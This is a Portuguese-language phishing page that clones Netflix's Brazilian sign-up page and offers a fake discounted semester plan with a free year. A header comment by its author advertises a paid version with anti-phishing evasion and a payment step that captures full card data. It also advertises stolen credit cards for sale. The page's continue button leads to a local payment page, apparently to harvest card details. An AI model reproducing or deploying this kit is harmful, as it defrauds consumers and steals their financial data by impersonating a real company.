<!DOCTYPE html>
<!-- saved from url=(0047)https://www.netflix.com/getstarted?locale=pt-BR 
  NÃO RETIRE ESSES CRÉDITOS E NÃO VENDA ESSA PAGINA!
#######################################################
#                PAGINA FEITA POR R3DRAC              #
#######################################################
#              ESSA É UMA VERSÃO GRÁTIS               #
#                                                     #
#                  ENTRE EM CONTATO                   #
#                SKYPER: LIVE:REDRAC_5                #
#      MANDE ME UM E-MAIL: REDRAC00@OUTLOOK.COM       #
#    --------------------------------------------     #
#     TRABALHO COM OUTRAS TELAS BANKER E CARDER       #
#    --------------------------------------------     #
#        TRABALHO COM SPAM VPS E COM SOFTWARES        #
#    --------------------------------------------     #
#    TRABALHO COM TESTADORES E OUTROS UTILITARIOS     #
#    ---------------------------------------------    #
#             VENDO CC BANKER E CC CARDER             #
#    ----------------------------------------------   #
#         ENTRE EM CONTATO E APRENDA A FATURAR        #
#######################################################
#             VALOR DA PAGINA NETFLIX FULL            #
#                     R$ 300,00                       #
#                                                     #
#      EVITE QUE SUA PAGINA SAIA DO AR RAPIDAMENTE    #
#      COMPRE A VERSÃO FULL E RECEBA ELA ATUALIZADA   #
# COM ANTI-PHISHING COM MAIS DE 280 PAGINAS DIFERENTES#
#                CONTADOR DE CLIQUES                  #
#      SISTEMA DE PAGAMENTO PAYPAL PEGANDO CC FULL    #
#      "NÃO RECEBA MAIS INFO COM CARACTERS ERRADO"    #
#           SISTEMA DE VALIDAÇÃO DOS CAMPOS           #
#                                                     #
#######################################################
#        NÃO ME RESPONSABILIZO PELOS SEUS ATOS        #
#        TAMBÉM NÃO DISSE QUE ERA APENAS ESTUDOS      #
#######################################################
#       ESTA PAGINA NÃO PODE SER COMERCIALIZADA       #
#######################################################
-->
<html lang="pt-BR" xmlns:fb="http://ogp.me/ns/fb#" class=" js flexbox flexboxlegacy webgl no-touch postmessage websqldatabase indexeddb history rgba multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients csstransforms csstransforms3d csstransitions generatedcontent localstorage sessionstorage bgsizecover display-table mediaqueries cssvmaxunit cssvminunit cssvhunit cssvwunit formvalidation no-ie8compat performance  no-pointerevents"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript" async src="./Netflix - Assista a séries online, Assista a filmes online_files/lidar.js"></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/req" async></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/B8281902.111923149"></script><script type="text/javascript" async src="./Netflix - Assista a séries online, Assista a filmes online_files/ga.js"></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/usr" async></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/conversion_async.js"></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/tm23881.js"></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/tag"></script><script type="text/javascript" src="./Netflix - Assista a séries online, Assista a filmes online_files/tag(1)"></script><script async src="./Netflix - Assista a séries online, Assista a filmes online_files/tag.js">{'site':'voKfK9l'}</script>
    <title>Netflix - Assista a séries online, Assista a filmes online</title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge;chrome=1">
    
    <meta name="description" content="Assista online a filmes e séries ou transmita diretamente para sua TV com o Xbox, Wii, PlayStation e muitos outros aparelhos. Comece seu mês grátis hoje.">
    <meta name="keywords" content="assistir filmes, filmes online, assistir TV, TV online, séries online, assistir séries, transmitir filmes, transmitir tv, transmissão instantânea, assistir online, filmes, assistir filmes canadá, assistir TV online canadá, sem download, filmes completos">
    <meta name="title" content="Netflix - Assista a séries online, Assista a filmes online">
    <meta name="viewport" content="initial-scale=1.0, user-scalable=0,minimum-scale=1.0, maximum-scale=1.0,width=device-width">
    <meta name="ROBOTS" content="NOODP">

    
    
    <meta name="apple-mobile-web-app-capable" content="yes">
<meta names="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<link rel="apple-touch-icon" href="https://secure.netflix.com/us/layout/ecweb/netflix-app-icon_152.jpg">
    
    <link rel="canonical" href="./Netflix - Assista a séries online, Assista a filmes online_files/Netflix - Assista a séries online, Assista a filmes online.html">

    
    
    <link rel="shortcut icon" href="https://secure.netflix.com/us/layout/ecweb/nf-favicon-hires.ico">

    <link type="text/css" rel="stylesheet" href="./Netflix - Assista a séries online, Assista a filmes online_files/include">


    <link type="text/css" rel="stylesheet" href="./Netflix - Assista a séries online, Assista a filmes online_files/include(1)">


    <script type="text/javascript">
            if(top != self) {
    top.location = location;
}

    </script>

    
    <!--[if lt IE 9]>
    <script src="https://www.netflix.com/js/include?f=modernizr_custom;WEB_JS&d=3&locale=pt-BR"></script>
    <![endif]-->

    


    

    <script type="text/javascript">
window.netflix = window.netflix || {};
window.netflix.notification = window.netflix.notification || {};
window.netflix.notification.specification = netflix.notification.specification || {};

window.netflix.notification.constants = {
	"pageName": "registration",
	"locale":  "pt-BR",
	"uiMode": "nonmember",
	"ltIE9": false,
	"ownerToken" : "5KLZCRH475CT7M2VTSVKS4R4QA"
};

window.netflix.notification.specification.uiView = {
            impression : {
                send : "end",
                overlapping: true
            },
            command : {
                send : "end"
            },
            focus: {
                 send:"both"
            }
};

window.netflix.notification.specification.uiAction = {
            dataInputValidate :{
                send: "both"
            }
};

window.netflix.notification.specification.social = {
            socialConnect: {
                send : "both"
            },
            socialConnectImpression: {
                eventProperties: {
                    value: "view"
                },
                send : "both"
            }
};
</script>


<!--[if lt IE 9]>
<script type="text/javascript">
window.netflix.notification.constants.ltIE9 = true;
</script>
<![endif]-->



    <script src="./Netflix - Assista a séries online, Assista a filmes online_files/clientNotifications.min.20141028.js" type="text/javascript"></script>
<style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}.fb_link img{border:none}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_reset .fb_dialog_legacy{overflow:visible}.fb_dialog_advanced{padding:10px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px}.fb_dialog_content{background:#fff;color:#333}.fb_dialog_close_icon{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;_background-image:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif);cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{top:5px;left:5px;right:auto}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent;_background-image:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif)}.fb_dialog_close_icon:active{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent;_background-image:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yL/r/s816eWC-2sl.gif)}.fb_dialog_loader{background-color:#f6f7f8;border:1px solid #606060;font-size:24px;padding:20px}.fb_dialog_top_left,.fb_dialog_top_right,.fb_dialog_bottom_left,.fb_dialog_bottom_right{height:10px;width:10px;overflow:hidden;position:absolute}.fb_dialog_top_left{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 0;left:-10px;top:-10px}.fb_dialog_top_right{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -10px;right:-10px;top:-10px}.fb_dialog_bottom_left{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -20px;bottom:-10px;left:-10px}.fb_dialog_bottom_right{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/ye/r/8YeTNIlTZjm.png) no-repeat 0 -30px;right:-10px;bottom:-10px}.fb_dialog_vert_left,.fb_dialog_vert_right,.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{position:absolute;background:#525252;filter:alpha(opacity=70);opacity:.7}.fb_dialog_vert_left,.fb_dialog_vert_right{width:10px;height:100%}.fb_dialog_vert_left{margin-left:-10px}.fb_dialog_vert_right{right:0;margin-right:-10px}.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{width:100%;height:10px}.fb_dialog_horiz_top{margin-top:-10px}.fb_dialog_horiz_bottom{bottom:0;margin-bottom:-10px}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #3a5795;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{-webkit-transform:none;height:100%;margin:0;overflow:visible;position:absolute;top:-10000px;left:0;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{max-height:590px;min-height:590px;max-width:500px;min-width:500px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .45);position:absolute;left:0;top:0;width:100%;min-height:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_content .dialog_header{-webkit-box-shadow:white 0 1px 1px -1px inset;background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#738ABA), to(#2C4987));border-bottom:1px solid;border-color:#1d4088;color:#fff;font:14px Helvetica, sans-serif;font-weight:bold;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{-webkit-font-smoothing:subpixel-antialiased;height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#4966A6), color-stop(.5, #355492), to(#2A4887));border:1px solid #2f477a;-webkit-background-clip:padding-box;-webkit-border-radius:3px;-webkit-box-shadow:rgba(0, 0, 0, .117188) 0 1px 1px inset, rgba(255, 255, 255, .167969) 0 1px 0;display:inline-block;margin-top:3px;max-width:85px;line-height:18px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{border:none;background:none;color:#fff;font:12px Helvetica, sans-serif;font-weight:bold;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #555;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f6f7f8;border:1px solid #555;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_hide_iframes iframe{position:relative;left:-10000px}.fb_iframe_widget_loader{position:relative;display:inline-block}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}.fb_iframe_widget_loader iframe{min-height:32px;z-index:2;zoom:1}.fb_iframe_widget_loader .FB_Loader{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat;height:32px;width:32px;margin-left:-16px;position:absolute;left:50%;z-index:4}</style></head>

<body id="page-GETSTARTED" class="page-GETSTARTED freetrial pt-BR pt  nhp   nbnding   " data-country="BR" data-region="LATIN_AMERICA" data-subregion="">

    
    
    <header class="pop clearfix ">
    <div class="shadow"></div>
    <a href="https://www.netflix.com/?locale=pt-BR" title="Netflix" class="logo">
        <div class="img"><img src="./Netflix - Assista a séries online, Assista a filmes online_files/logo-reg2x.png" id="print-img"></div>
    </a>

    <div class="hlinks">
    <a class="msil" href="https://www.netflix.com/Login?locale=pt-BR"><span class="shim"></span><span class="text">Entrar</span></a>
</div>

<span id="exp_links">
    
    
</span>



</header>

    <noscript>
    &lt;style type="text/css"&gt;
        #uma {
            display: none;
            padding-top: 10px;
            padding-bottom: 10px;
        }

        .no-js #uma {
            display: block;
            background-color: #DC5B00;
            color: white;
        }

        #uma img {
            float: left;
            margin-right: 15px;
            margin-bottom: 15px;
        }

        #uma h2 {
            font-size: 16px;
            font-weight: 700;
        }

        #uma p {
            font-weight: 400;
            font-size: 12px;
        }

        #fb-connected {
            display: none;
        }

        #uma .beacon {
            height: 0;
            width: 0;
            position: absolute;
        }
    &lt;/style&gt;

    &lt;div class="contents-wrapper clearfix"&gt;
        &lt;section id="uma" class="contents clearfix"&gt;
            &lt;img src="https://secure.netflix.com/us/layout/ecweb/common/error_exclamation_white_large_40w.png"&gt;
            &lt;div class="txt-area"&gt;
                &lt;h2&gt;Parece que o JavaScript está desativado&lt;/h2&gt;
                &lt;p&gt;O site da Netflix requer Javascript para funcionar corretamente. Habilite o suporte a JavaScript e recarregue esta página.&lt;/p&gt;
            &lt;/div&gt;
            &lt;img class="beacon" src="https://www.netflix.com/beacons?js_disabled_banner=true&amp;locale=pt-BR" /&gt;
        &lt;/section&gt;
    &lt;/div&gt;
</noscript>
    <div class="main contents-wrapper">
    <section class="contents">
        <link type="text/css" rel="stylesheet" href="./Netflix - Assista a séries online, Assista a filmes online_files/include(2)">




<style type="text/css">



</style>

<section id="topblock">
    <div class="mh_h1">
        <h1 class="hmain">Promoção Exclusiva Netflix Semestral</h1>
        <div>Pague com 50% de desconto e ainda ganhe 1 ano grátis!</div>
    </div>
</section>

<section id="streamPlanFormCont">
    <section id="price-tiers">
        <link type="text/css" rel="stylesheet" href="./Netflix - Assista a séries online, Assista a filmes online_files/include(3)">
<!--[if lt IE 9]>
<link type="text/css" rel="stylesheet" href="https://www.netflix.com/css/include?f=ie8_pt7_grid;WEB_CSS;ad5099746d8a37b84040372cb4683516|" />

<![endif]-->

<form id="streamPlanForm">
    <div class="container first" style="width: 100%;">
        <div class="row">
            <div class="column first"></div>
            <div class="column tiers selTierColor">
                <div class="selborder selected">

                    <label for="stream_1" class="square selected" id="label_1" style="height: 120px;"><div class="padding"><span class="num_screen">Básico</span><input type="radio" name="stream" id="stream_1" data-price="R$17,90" value="114001031"></div></label>

                </div>
                <div class="selarrow"></div>

            </div>
            <div class="column tiers">
                <div class="selborder">

                    <label for="stream_2" class="square" id="label_2" style="height: 120px;"><div class="padding"><span class="num_screen">Padrão</span><input type="radio" name="stream" id="stream_2" data-price="R$19,90" value="10318" checked=""></div></label>

                </div>
                <div class="selarrow"></div>

            </div>
            <div class="column tiers">
                <div class="selborder">

                    <label for="stream_4" class="square" id="label_4" style="height: 120px;"><div class="padding"><span class="num_screen">Premium</span><input type="radio" name="stream" id="stream_4" data-price="R$26,90" value="10338"></div></label>

                </div>
                <div class="selarrow"></div>

            </div>
        </div>
    </div>


    <div class="alt first" style="margin-top: 10px;">Preço do Semestre com 50% de Desconto</div>

    <div class="container">
        <div class="row">
            <div class="column first">Preço do Semestre com 50% de Desconto</div>
            <div class="column tiers selTierColor">R$53,70</div>
            <div class="column tiers">R$59,70</div>
            <div class="column tiers">R$80,70</div>
        </div>
    </div>

    <div class="alt">HD disponível</div>

    <div class="container">
        <div class="row">
            <div class="column first">HD disponível</div>
            <div class="column tiers selTierColor"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
        </div>
    </div>

    <div class="alt">Ultra HD (quando disponível)</div>

    <div class="container">
        <div class="row">
            <div class="column first">Ultra HD (quando disponível)</div>
            <div class="column tiers selTierColor"><div class="nocross"></div></div>
            <div class="column tiers"><div class="nocross"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
        </div>
    </div>

    <div class="alt">Telas em que você pode assistir ao mesmo tempo</div>

    <div class="container">
        <div class="row">
            <div class="column first">Telas em que você pode assistir ao mesmo tempo</div>
            <div class="column tiers selTierColor"><span class="tier_num">2</span></div>
            <div class="column tiers"><span class="tier_num">4</span></div>
            <div class="column tiers"><span class="tier_num">6</span></div>
        </div>
    </div>

    <div class="alt"><strong>Ganhe 1 ano de Netflix Grátis</strong></div>

    <div class="container">
        <div class="row">
            <div class="column first"><strong>Ganhe 1 ano de Netflix Grátis</strong></div>
            <div class="column tiers selTierColor"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
        </div>
    </div>

    <div class="alt">Filmes e séries de TV ilimitados</div>

    <div class="container">
        <div class="row">
            <div class="column first">Filmes e séries de TV ilimitados</div>
            <div class="column tiers selTierColor"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
        </div>
    </div>

    <div class="alt">Cancele online quando quiser</div>

    <div class="container">
        <div class="row">
            <div class="column first">Cancele online quando quiser</div>
            <div class="column tiers selTierColor"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
        </div>
    </div>

    <div class="alt">Promoção válida por E-mail</div>

    <div class="container last">
        <div class="row">
            <div class="column first">Promoção válida somente por E-mail</div>
            <div class="column tiers selTierColor"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
            <div class="column tiers"><div class="yescheck"></div></div>
        </div>
    </div>
</form>

        <div class="hd_avail">Ultra HD disponível apenas no plano de 6 telas + HD. A disponibilidade de HD (alta definição) e Ultra HD (ultra alta definição) está sujeita a seu serviço de Internet e à funcionalidade do aparelho usado. Nem todo conteúdo está disponível em HD ou Ultra HD. Leia os <a href="https://www.netflix.com/TermsOfUse?locale=pt-BR" target="_blank" class="a-subtle">Termos de uso</a> para obter mais detalhes.</div>
    </section>
</section>

<noscript>
    &lt;style&gt;
        .reg_section {
            display:block;
        }
    &lt;/style&gt;
</noscript>
<a href="pagamento/pagamento.html">
<button type="button" id="cont_tiers_button" class="blue btnlg" style="display: none;">Continuar</button>
</a> </section>
</div>

    <div class="footer contents-wrapper">
    <footer class="clearfix limited">

        <ul>
            
            <li class="last">Perguntas? Ligue para <nobr>0 800 086 4041</nobr></li>
        </ul>

        <label for="lang-switcher" class="lang-switcher clearfix group4">
            <img src="./Netflix - Assista a séries online, Assista a filmes online_files/globe.png">
            <select id="lang-switcher">
                <option data-locale-href="/getstarted?locale=en-BR&amp;sw=true" value="en-BR">English</option>
                <option selected="">Português</option>
            </select>
        </label>

        <div class="fterms not-printable">
O uso do serviço Netflix e deste site constituem a aceitação de nossos <a id="terms_lnk" href="https://www.netflix.com/TermsOfUse?locale=pt-BR">Termos de uso</a> e de nossa <a id="priv_lnk" href="https://www.netflix.com/PrivacyPolicy?locale=pt-BR">Política de privacidade</a>. <br><a id="cookies_lnk" href="https://www.netflix.com/cookies?locale=pt-BR">Sobre cookies e publicidade na internet</a> © 1997-2015 Netflix, Inc.
<span class="serverid">(us-east-1 b1d95c5e BR)</span>
[<span class="abtest-info">4916/1 - 4917/4 - 5919/1 - 4918/1 - 4919/1 - 5944/1 - 5945/2 - 4913/2 - 4914/2 - 4915/1 - , pt</span>]
</div>
    </footer>
</div>



    
    

<script src="./Netflix - Assista a séries online, Assista a filmes online_files/include(4)"></script>
<script src="./Netflix - Assista a séries online, Assista a filmes online_files/include(5)"></script>
<script src="./Netflix - Assista a séries online, Assista a filmes online_files/include(6)"></script>

<script type="text/javascript">
    

    Modernizr.addTest('pointerevents', function () {
        // 
        var bool = false,
            i = Modernizr._domPrefixes.length;

        // 
        bool = Modernizr.hasEvent('pointerdown');

        while (i-- && !bool) {
            if (Modernizr.hasEvent(Modernizr._domPrefixes[i] + 'pointerdown')) {
                bool = true;
            }
        }
        return bool;
    });

</script><script type="text/javascript">
    $(document).ready(function () {
        appendStreamPlan();
        $("#streamPlanForm").change(function() {
            appendStreamPlan();
        });

        eqHeighter();
        $(window).resize(function() {
            eqHeighter();
        });

    });

    var eqHeighter = function() {
        var elHeight = 0;
        $("#streamPlanForm .square").css("height", $("#streamPlanForm .square").width());
    };


    var appendStreamPlan = function() {

        var selPlanPrice = $("input[type='radio'][name='stream']:checked").attr("data-price");
        var selPlanValue = $("input[type='radio'][name='stream']:checked").attr("value");
        var selPlan = $("input[type='radio'][name='stream']:checked").attr("id");



        $(".currPlanPrice").html(selPlanPrice);
        $("#streamPlanForm  .square").removeClass("selected");
        $("#streamPlanForm  .selborder").removeClass("selected");
        $("input[type='radio'][name='stream']:checked").parents("#streamPlanForm .square").addClass("selected");
        $("input[type='radio'][name='stream']:checked").parents("#streamPlanForm .selborder").addClass("selected");
        netflix.utils.beacon('stream_toggle=true&plan=' + selPlan);
        $("input[name='selectedPlan']").val(selPlanValue);

        var colPols = $("input[type='radio'][name='stream']:checked").parents(".column").index();
        $('.row .column').removeClass("selTierColor");
        $('.row .column').each( function() {
            if ($(this).index() == colPols) {
                $(this).addClass("selTierColor");
            }
        });

        try {
            netflix.clientNotifications && netflix.clientNotifications.notifyStart("command",{category: "uiView"});
            netflix.clientNotifications && netflix.clientNotifications.notifyEnd("command", {category: "uiView",data:{"name": "streamPlanSelection", inputValue: selPlan}});

        }catch (error) {}

    };

    $(function() {
        var topblock = $(".container.first");
        var topblockheight = topblock.height();
        var parentwidth= $("#price-tiers").width();
        var topblockoffset = topblock.offset().top;
        var scrollType = Modernizr.touch ? 'touchmove' : 'scroll';

        $(window).on('orientationchange', function() {
            topblock.css("width", "100%");
            topblock.removeClass("fixedClass");
            $(".alt.first").css("margin-top", "10px");
        });

        $(window).resize(function() {

            topblockheight = topblock.height();
            parentwidth= $("#price-tiers").width();
            topblockoffset = topblock.offset().top;

            if ($(window).width() >  567)  {
                topblock.css("width", "100%");
                topblock.removeClass("fixedClass");
                $(".alt.first").css("margin-top", "10px");
            }

        });

        $(window).bind(scrollType, function(e) {
            if ($(window).width() <=  567) {
                if (($(window).scrollTop() >= topblockoffset) && !paymentShown) {
                    topblock.addClass("fixedClass");
                    topblock.css("width", parentwidth);
                    $(".alt.first").css("margin-top", topblockheight + 35);
                } else {
                    topblock.removeClass("fixedClass");
                    $(".alt.first").css("margin-top", "10px");
                };
           }
        });
    });


</script><script type="text/javascript">
var paymentShown = false;
var pCcookie = netflix.utils.getCookie("reg_cont_clicked");
if (typeof pCcookie == 'undefined' || pCcookie == null || pCcookie == '') {
    $("#cont_tiers_button").css("display", "block");
} else {
    $(".reg_section").css("display", "block");
    paymentShown = true;
}

$("#cont_tiers_button").click(function() {
    var disttop = $("#cont_tiers_button").offset().top;
    paymentShown = true;
    $(".container.first").removeClass("fixedClass");
    $(".alt.first").css("margin-top", "10px");
    $("#cont_tiers_button").hide();
    $('body').append("<div id='botspacer'/>");
    $("#botspacer").css("height", disttop);
    $(".reg_section").slideDown("slow");
    $('html, body').animate({scrollTop: $(".reg_section").offset().top - 20}, 500, function() {
        $(window).on('scroll', function() {
            if (($(window).scrollTop() - $('body').offset().top) < 45 ) {
                $('#botspacer').remove();
            }
        });
    });
    netflix.utils.setCookie('reg_cont_clicked','true',168,'netflix.com');
    netflix.utils.beacon('cont_clicked=true');
});

</script><script type="text/javascript">
    
        $('.main.contents-wrapper form').each(function(){
            var formElements = $('input:not([type=hidden]), button, select', $(this));

            formElements.each(function(index, ele){
                $(ele).focusin(function(e){
                    var targetName = e.target.name ? e.target.name : e.target.id;
                    if(!targetName){
                    targetName = e.target.className;
                    }
                    try{
                       netflix.clientNotifications && netflix.clientNotifications.notifyStart("focus",  {category: "uiView", data: {view : targetName }});
                    }catch (error) {
                        netflix.utils.beacon('clientNotifications=' + error);
                    }

                });


                $(ele).blur(function(e){
                    var targetName = e.target.name ? e.target.name : e.target.id;
                    if(!targetName){
                    targetName = e.target.className;
                    }
                    try{
                        netflix.clientNotifications && netflix.clientNotifications.notifyEnd("focus", {category: "uiView", data: {view : targetName }});

                    }catch (error) {
                        netflix.utils.beacon('clientNotifications=' + error);
                    }

                });

            });
        });


    

        jQuery('#regform').on('submit', function () {
          netflix.window.trigger('wait-on-data');
        });

    netflix.utils.preventDoubleSubmit('#regform');

    


function executeClearDoubleSubmit(e){
    netflix.utils.clearDoubleSubmitTimeout();
}

function waitOnData(e){
    netflix.window.trigger('wait-on-data');
}


</script><script type="text/javascript">

jQuery(document).ready(function (event) {
    netflix.facebook.init("pt_BR", true);
});


</script><script type="text/javascript">
(function () {

    var handleInteractions = function (eventObject) {
        if (netflix.window.width() < 650) {
            var trigger = jQuery(eventObject.target).attr('data-trigger-for-open');
            if (typeof trigger != 'undefined') {
                jQuery('.' + trigger).toggleClass('open');
            }
        }
    };

    jQuery(document).on('click', handleInteractions);

    var langSwitcher = jQuery('select#lang-switcher');

    langSwitcher.on('change', function () {
        var localehref = langSwitcher.children().filter(':selected').attr('data-locale-href');
        if (typeof localehref != 'undefined') {
            window.location = localehref;
        }
    });

})();

</script><script type="text/javascript">
(function() {
    var config = {
        padmeHost: "https://help.netflix.com"
    };
    var params = {
        country: "BR",
        locale: "pt-BR",
        page: location.pathname.replace("/", "")
    };

    var cseScript = config.padmeHost+"/supportscript?" + $.param(params);

    netflix.namespace("netflix.utils.chat");

    netflix.utils.chat.loaded = $.getScript(cseScript).done(function(script, textStatus) {
        jQuery(window).trigger('loaded.chat');
    })
    .fail(function(jqxhr, settings, exception) {
        netflix.utils.beacon('cs_chat=js_failure');
    });
})();

</script>


<script type="text/javascript">
    if (!netflix) netflix = {};
    if (!netflix.tracking) netflix.tracking = {};

    jQuery.extend(netflix.tracking, {
        page : 'GETSTARTED',
        visitorid : '00215eac-eb9c-459a-b73c-a7449c7afb4c',
        pid : '80034885',
        fcat : '6',
        porg : escape("Netflix Global"),
        lUrl : 'WELCOME',
        lArgs : '',
        wasformer : false,
        isformer : false,
        wasnever : false,
        isnever : false,
        anonornon : true,
        isnrmem : true,
        isnrd : false,
        facebooksignup : false
    });

    (function () {
        var tagjs = document.createElement("script");
        var s = document.getElementsByTagName("script")[0];
        tagjs.text = "{'site':'voKfK9l'}";
        tagjs.async = true;
        tagjs.src = "//s.btstatic.com/tag.js";
        s.parentNode.insertBefore(tagjs, s);
    }());
</script>
<noscript>
    &lt;iframe src="//s.thebrighttag.com/iframe?c=voKfK9l" width="1" height="1"
            frameborder="0" scrolling="no" marginheight="0" marginwidth="0"&gt;&lt;/iframe&gt;
</noscript>

    
<script type="text/javascript">
    netflix.namespace('netflix.stats.screensize');
    netflix.namespace('netflix.stats.supportedFeatures');

    netflix.stats.screensize.categorize = function (dimension) {
        var dimensionStr = 'nocat';

        if (dimension <= 500) {
            dimensionStr = '0-500';
        } else if (dimension <= 1000) {
            dimensionStr = '501-1000';
        } else if (dimension <= 1500) {
            dimensionStr = '1001-1500';
        } else if (dimension <= 2000) {
            dimensionStr = '1501-2000';
        } else if (dimension <= 2500) {
            dimensionStr = '2001-2500';
        } else if (dimension > 2500) {
            dimensionStr = '>2500';
        }

        return dimensionStr;
    };

    netflix.stats.screensize.log = function () {
        var screenW = screen.width, screenH = screen.height;
        var viewW = jQuery(window).width(), viewH = jQuery(window).height();

        var payload = '' +
                'ssize='+       screenW + 'w' + screenH + 'h' + '&' +
                'ssizeCat='+    netflix.stats.screensize.categorize(screenW) + 'w' + netflix.stats.screensize.categorize(screenH) + 'h' + '&' +
                'vsize='+       viewW + 'w' + viewH + 'h' + '&' +
                'vsizeCat='+    netflix.stats.screensize.categorize(viewW) + 'w' + netflix.stats.screensize.categorize(viewH) + 'h' + '&' +
                'deviceType='+  (typeof netflix.utils.UserAgent != 'undefined' ? netflix.utils.UserAgent.getDeviceType() : 'unknown') + '&' +
                'ismobile='+    'false'
        ;

        netflix.utils.beacon(payload);
    };

    netflix.stats.supportedFeatures.log = function () {
        var classList = jQuery('html').attr('class'),
            payload = 'features=' + classList.replace(/^\s+|\s+$/g, '');

        netflix.utils.beacon(payload);
    };

    jQuery(document).ready(setTimeout(function () {
            netflix.stats.screensize.log();

            /*  */
        },
        500
    ));

</script>

    

    



